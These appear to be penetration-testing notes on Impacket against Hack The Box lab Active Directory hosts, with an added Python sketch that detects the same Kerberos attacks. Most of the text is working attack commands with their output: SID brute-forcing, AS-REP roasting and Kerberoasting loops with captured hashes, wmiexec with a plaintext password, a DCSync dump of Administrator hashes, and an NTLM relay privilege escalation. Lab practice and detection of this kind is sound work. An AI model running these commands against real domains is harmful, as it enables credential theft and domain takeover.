Impacket

On Kali Linux, the Impacket example scripts are located here:

/usr/share/doc/python3-impacket/examples

Lookup SID

└─# python3 ./lookupsid.py hazard:stealth1agent@10.129.96.157           
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

GetNPUsers

Identify users that do not require Kerberos pre-authentication (to get a TGT)

impacket-GetNPUsers domain/user -request -no-pass -dc-ip <AD-IP>
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210

#!/bin/bash
# Run GetNPUsers for every name in usernames.txt and append the output to hash.txt
while IFS= read -r p
do
        echo "[$p]"
        impacket-GetNPUsers egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.129.95.180 >> hash.txt
done < ./usernames.txt

GetUserSPNs

impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.129.229.121 -request     
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$07b7289ca17b0f3529dff209c5872316$12c0ee251b2f58e3a343efd0dcc5071c36146292f838f8bbabfe3ab7625cbda5f070abbfb731dab4179e106cdbd
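
What the GetNPUsers and GetUserSPNs requests above look like from the domain controller's side, as an added detection sketch (not part of the original notes or of Impacket). The events are constructed, simplified records modelled on Windows Security events 4768 and 4769; the dictionary key names, the threshold, and the 192.0.2.x addresses are assumptions.

```python
from collections import defaultdict

# Constructed sample: simplified records modelled on Windows Security events
# 4768 (TGT request) and 4769 (service ticket request). Key names are assumed.
SAMPLE_EVENTS = [
    {"id": 4768, "user": "fsmith", "ip": "192.0.2.10", "status": "0x6"},
    {"id": 4768, "user": "hbear", "ip": "192.0.2.10", "status": "0x6"},
    {"id": 4768, "user": "skerb", "ip": "192.0.2.10", "status": "0x6"},
    {"id": 4768, "user": "svc-alfresco", "ip": "192.0.2.10", "status": "0x0",
     "preauth": "0", "etype": "0x17"},
    {"id": 4768, "user": "jdoe", "ip": "192.0.2.33", "status": "0x0",
     "preauth": "2", "etype": "0x12"},
    {"id": 4769, "user": "svc_tgs", "service": "Administrator",
     "ip": "192.0.2.10", "status": "0x0", "etype": "0x17"},
    {"id": 4769, "user": "jdoe", "service": "FILESRV01$",
     "ip": "192.0.2.33", "status": "0x0", "etype": "0x12"},
]

PRINCIPAL_UNKNOWN = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN
RC4_HMAC = "0x17"           # etype 23, the "$23$" in a $krb5tgs$23$ hash


def detect(events, enum_threshold=3):
    """Return (rule, source_ip, detail) tuples for suspicious Kerberos activity."""
    findings = []
    unknown_by_ip = defaultdict(set)
    for e in events:
        if e["id"] == 4768:
            if e["status"] == PRINCIPAL_UNKNOWN:
                # Many distinct unknown names from one host: username guessing.
                unknown_by_ip[e["ip"]].add(e["user"])
            elif e["status"] == "0x0" and e.get("preauth") == "0":
                # TGT issued with no pre-authentication data at all.
                findings.append(("asrep-no-preauth", e["ip"], e["user"]))
        elif e["id"] == 4769 and e["status"] == "0x0":
            svc = e.get("service", "")
            # RC4 ticket for a user-backed service (not a machine account or krbtgt).
            if e.get("etype") == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
                findings.append(("rc4-service-ticket", e["ip"], svc))
    for ip, users in sorted(unknown_by_ip.items()):
        if len(users) >= enum_threshold:
            findings.append(("user-enumeration", ip, len(users)))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Accounts surfaced by the first two rules are the ones to fix at the source: require pre-authentication, and give user-backed service accounts AES-only keys with long random passwords.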

GetADUsers

impacket-GetADUsers -all active.htb/svc_tgs -dc-ip 10.129.229.121
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password:
[*] Querying 10.129.229.121 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------
Administrator                                         2018-07-18 15:06:40.351723  2023-06-25 07:58:08.601346 
Guest                                                 <never>              <never>             
krbtgt                                                2018-07-18 14:50:36.972031  <never>             
SVC_TGS      

WMIexec

impacket-wmiexec active.htb/administrator:Ticketmaster1968@10.129.229.121

Secretsdump - DCSync

└─$ impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up... 

SMBServer

impacket-smbserver -smb2support share .

NTLM relay

/usr/share/doc/python3-impacket/examples/ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss
